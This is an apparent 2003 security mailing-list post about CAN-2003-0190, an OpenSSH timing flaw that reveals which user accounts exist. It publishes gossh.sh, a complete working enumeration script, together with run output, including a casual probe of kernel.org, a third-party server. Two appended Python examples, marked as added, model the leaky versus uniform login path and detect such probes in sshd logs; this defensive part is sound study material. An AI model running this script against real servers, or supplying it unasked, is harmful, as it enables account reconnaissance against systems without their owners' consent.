From: nc at stormvault.net (Nicolas Couture)
Subject: CAN-2003-0190 - OpenSSH <= 3.6.1p1

After my

--- experience ---
bash-2.05a$ ./a.out
SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved

Usage: ./a.out <protocol version> <user file> <host>
bash-2.05a$ echo root > file
bash-2.05a$ ./a.out 2 file 0
SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved

Testing an illegal user : sh: ./ssh: No such file or directory
sh: ./ssh: No such file or directory
sh: ./ssh: No such file or directory
127 second(s)
Testing login root : sh: ./ssh: No such file or directory
ILLEGAL [127 second(s)]
bash-2.05a$ cp `which ssh` .
bash-2.05a$ ./a.out 2 file 0
SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved

Testing an illegal user : not_val_user@0's password:   # here I had to type enter manually (????)
Permission denied, please try again.
not_val_user@0's password:   # and so here as well as all other password prompts
Permission denied, please try again.
not_val_user@0's password:
Permission denied (publickey,password,keyboard-interactive).
not_val_user@0's password:
Permission denied, please try again.
not_val_user@0's password:
Permission denied, please try again.
not_val_user@0's password:
Permission denied (publickey,password,keyboard-interactive).
not_val_user@0's password:
Permission denied, please try again.
not_val_user@0's password:
Permission denied, please try again.
not_val_user@0's password:
Permission denied (publickey,password,keyboard-interactive).
255 second(s)
Testing login root : root@0's password:
Permission denied, please try again.
root@0's password:
Permission denied, please try again.
root@0's password:
Permission denied (publickey,password,keyboard-interactive).
ILLEGAL [255 second(s)]
bash-2.05a$
--- experience ---

with ssh_brute.c from mediaservice.net, who lately released an advisory for OpenSSH <= 3.6.1p1 that became CAN-2003-0190 (http://lab.mediaservice.net/advisory/2003-01-openssh.txt), I decided to write my own working exploit:

--- gossh.sh ---
#!/bin/sh
# OpenSSH <= 3.6.1p1 - User Identification.
# Nicolas Couture - nc@...rmvault.net
#
# Description:
#  -Tells you whether or not a user exists on
#   a distant server running OpenSSH.
#
# Usage:
#  -You NEED to have the host's public key
#   before executing this script.
#
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
# Fact Sheet:                                   #
#                                               #
#  o It is really accurate against              #
#    redhat boxes.                              #
#  o Linux boxes running grsecurity             #
#    have a 10 second delay on both             #
#    valid AND invalid user login               #
#    attempts.                                  #
#  o *BSD boxes are not vulnerable and          #
#    always have a 10 second delay like         #
#    Linux-Grsec + network protection           #
#                                               #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#

#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
# History:                                 #
#  Thu May 1 15:41:18 EDT 2003             #
#  ; Script started.                       #
#  Thu May 1 16:42:30 EDT 2003             #
#  ; Script is functional.                 #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#

# Let the user know how we work.
usage(){
    echo "$0 <user> <host>"
    exit 1
}

# Verify the arguments.
[ $# != 2 ] && usage

# Variables.
USER="$1"
HOST="$2"

#=-=-=-=-=-=-=-=-=-=-=-=-=#
# Expect script functions #
#=-=-=-=-=-=-=-=-=-=-=-=-=#

# Expect script for password.
# Tcl has no single-quote syntax, so `send '\r'` sends the dummy
# password ' followed by Enter, not an empty line.
expasswd() {
cat << EOF > expasswd
spawn $SSHCMD
expect password:
send '\r'
interact
EOF
}

# Expect script for error.
# Runs the password script and exits as soon as sshd answers
# "please try again."; the caller measures how long that took.
experror() {
cat << EOF > experror
spawn expect -f expasswd
expect again.
exit 1593
interact
EOF
}

#=-=-=-=-=-=-=-=-=-=#
# -Fake user timing #
#=-=-=-=-=-=-=-=-=-=#

# OpenSSH client command for a nonexistent user.
export SSHCMD="ssh nicolas_couture@$HOST"

# Build new expect scripts.
expasswd
experror

# Timing.
FDATE0=`date '+%s'`
echo "[-] Calculating fake user timeout..."
expect -f experror 1> /dev/null 2> /dev/null
FDATE1=`date '+%s'`

# Fake user timeout.
FUTO=`echo $FDATE1 - $FDATE0 | bc`
echo "[+] Found $FUTO."

#=-=-=-=-=-=-=-=#
# -$USER timing #
#=-=-=-=-=-=-=-=#

# OpenSSH command.
export SSHCMD="ssh $USER@$HOST"

# Build new expect scripts.
expasswd
experror

DATE0=`date '+%s'`
echo "[-] Calculating $USER timeout on $HOST..."
expect -f experror 1> /dev/null 2> /dev/null
DATE1=`date '+%s'`

# $USER timeout.
END=`echo $DATE1 - $DATE0 | bc`
echo "[+] Found $END."

#=-=-=-=-=#
# -Result #
#=-=-=-=-=#

if [ "$FUTO" -eq "$END" ] && [ "$FUTO" -eq "10" ]; then
    echo "This box is not vulnerable."
    exit 1
fi

# Use of our magic skills.
if [ "$FUTO" -lt "$END" ]; then
    echo "$USER exists on $HOST."
elif [ "$FUTO" -ge "$END" ]; then
    echo "$USER doesn't exist on $HOST."
else
    echo "Segmentation fault."
    exit 13
fi

# Remove tmp files.
rm -f expasswd experror

# EOF
--- gossh.sh ---

Interesting things you can find with this script...

--- snip ---
bash-2.05a$ ./gossh.sh linux kernel.org
[-] Calculating fake user timeout...
[+] Found 1.
[-] Calculating linux timeout on kernel.org...
[+] Found 1.
linux doesn't exist on kernel.org.
bash-2.05a$ finger linux@...nel.org
The latest stable version of the Linux kernel is:            2.4.20
The latest prepatch for the stable Linux kernel tree is:     2.4.21-rc1
The latest beta version of the Linux kernel is:              2.5.68
The latest snapshot for the beta Linux kernel tree is:       2.5.68-bk11
The latest 2.2 version of the Linux kernel is:               2.2.25
The latest 2.0 version of the Linux kernel is:               2.0.39
The latest prepatch for the 2.0 Linux kernel tree is:        2.0.40-rc6
The latest -ac patch to the stable Linux kernels is:         2.4.21-rc1-ac3
The latest -ac patch to the beta Linux kernels is:           2.5.67-ac2
The latest -dj patch to the beta Linux kernels is:           2.5.60-dj2
--- snip ---

This is a sign that the finger daemon has been hacked by some kernel.org people :)

Links:
-http://lab.mediaservice.net/advisory/2003-01-openssh.txt
-http://lab.mediaservice.net/code/ssh_brute.c
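The post measures the login-failure delay for a made-up user and for a real one and treats a difference as the oracle. The following is an added example, not code from the post or from OpenSSH: it models the two server-side login shapes behind that measurement. The account table, the hashing, the 10-second failure delay constant and the `delay` callable are constructed stand-ins for a real PAM stack; `delay` is injected so the behaviour can be checked without sleeping.

```python
"""Added example (not code from the post): a model of why a login path that
treats unknown accounts differently leaks their existence, next to a uniform
path. Accounts, hashing and the delay constant are constructed stand-ins."""
import hashlib
import hmac

FAIL_DELAY_SECONDS = 10   # the failure delay the post measures on grsec boxes


def _digest(salt: bytes, password: str) -> bytes:
    return hashlib.sha256(salt + password.encode()).digest()


_SALT = b"constructed-salt"
# Constructed account table: user -> (salt, digest of the real password).
ACCOUNTS = {"root": (_SALT, _digest(_SALT, "correct horse battery"))}
# Decoy credential used for unknown accounts so that path does the same
# hashing work as a real one (its comparison result is discarded below).
_DECOY = (_SALT, _digest(_SALT, "decoy"))


def authenticate_leaky(user, password, delay):
    """Vulnerable shape: an unknown user returns before any password work
    or failure delay happens. Returns (ok, delays_applied)."""
    if user not in ACCOUNTS:
        return False, 0                     # fast failure: the oracle
    salt, expected = ACCOUNTS[user]
    if hmac.compare_digest(_digest(salt, password), expected):
        return True, 0
    delay(FAIL_DELAY_SECONDS)
    return False, 1


def authenticate_uniform(user, password, delay):
    """Same hashing and same failure delay whether or not the user exists."""
    salt, expected = ACCOUNTS.get(user, _DECOY)
    match = hmac.compare_digest(_digest(salt, password), expected)
    if match and user in ACCOUNTS:
        return True, 0
    delay(FAIL_DELAY_SECONDS)
    return False, 1


def probe(auth):
    """What gossh.sh does from the client side: compare the cost of failing
    as a made-up user with the cost of failing as a real one. Returns
    (fake_user_seconds, real_user_seconds) as recorded from `delay`."""
    costs = []
    for user in ("nicolas_couture", "root"):
        slept = []
        auth(user, "'", slept.append)       # the script's dummy password is '
        costs.append(sum(slept))
    return tuple(costs)


if __name__ == "__main__":
    for name, fn in (("leaky", authenticate_leaky), ("uniform", authenticate_uniform)):
        fake, real = probe(fn)
        verdict = "oracle" if fake != real else "no difference"
        print(f"{name:8s} fake={fake}s real={real}s -> {verdict}")
```

With the leaky path the probe records 0 s for the fake user and 10 s for root, which is exactly the gap gossh.sh looks for; the uniform path records 10 s for both, the case the script reports as "not vulnerable".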
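From the server side, both ssh_brute and gossh.sh leave the same trace: a failed attempt for a name the host does not know, followed within seconds by an attempt for a real account, from one source. The following added example (not part of the post) flags that pattern in sshd's auth log. The log lines are constructed; the message formats ("Invalid user ... from", "Illegal user" in older releases, "Failed password for ...") are sshd's own, and the log year is assumed because syslog lines carry none.

```python
"""Added example (not part of the post): flag sources whose failed logins
mix a nonexistent account with another name inside a short window, the
footprint of a timing-based user probe. Sample lines are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

_TS = r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
INVALID_RE = re.compile(_TS + r"(?:Invalid|Illegal) user (?P<user>\S+) from (?P<ip>\S+)")
FAILED_RE = re.compile(_TS + r"Failed password for (?P<bad>(?:invalid|illegal) user )?"
                       r"(?P<user>\S+) from (?P<ip>\S+) port \d+")

LOG_YEAR = 2003   # assumed: syslog timestamps carry no year


def parse(line):
    """Return (time, ip, user, account_exists) for failure lines, else None."""
    m = INVALID_RE.match(line)
    exists = False
    if m is None:
        m = FAILED_RE.match(line)
        if m is None:
            return None
        exists = m.group("bad") is None
    ts = datetime.strptime(f"{LOG_YEAR} {m.group('ts')}", "%Y %b %d %H:%M:%S")
    return ts, m.group("ip"), m.group("user"), exists


def find_enumeration(lines, window=timedelta(seconds=60), min_users=2):
    """Flag a source that, within `window`, fails for at least `min_users`
    distinct names of which at least one does not exist. A single mistyped
    login does not trigger; a fake-user probe followed by a real-user probe
    does. Returns {ip: sorted names}."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec:
            by_ip[rec[1]].append(rec)
    findings = {}
    for ip, recs in by_ip.items():
        recs.sort()
        for i, (t0, _, _, _) in enumerate(recs):
            span = [r for r in recs[i:] if r[0] - t0 <= window]
            names = {r[2] for r in span}
            if len(names) >= min_users and any(not r[3] for r in span):
                findings[ip] = sorted(names)
                break
    return findings


# Constructed sample: a probe from 192.0.2.10 and a normal typo from another host.
SAMPLE = """\
May  1 15:41:18 srv sshd[2201]: Invalid user nicolas_couture from 192.0.2.10
May  1 15:41:19 srv sshd[2201]: Failed password for invalid user nicolas_couture from 192.0.2.10 port 40210 ssh2
May  1 15:41:31 srv sshd[2207]: Failed password for root from 192.0.2.10 port 40211 ssh2
May  1 15:55:02 srv sshd[2290]: Failed password for alice from 198.51.100.7 port 51022 ssh2
May  1 15:55:09 srv sshd[2290]: Accepted password for alice from 198.51.100.7 port 51022 ssh2
""".splitlines()

if __name__ == "__main__":
    for ip, names in find_enumeration(SAMPLE).items():
        print(f"{ip}: possible user enumeration, names tried: {', '.join(names)}")
```

The window and name threshold are deliberately conservative; on a busy host the same grouping can be fed from a log tail and the threshold raised to taste.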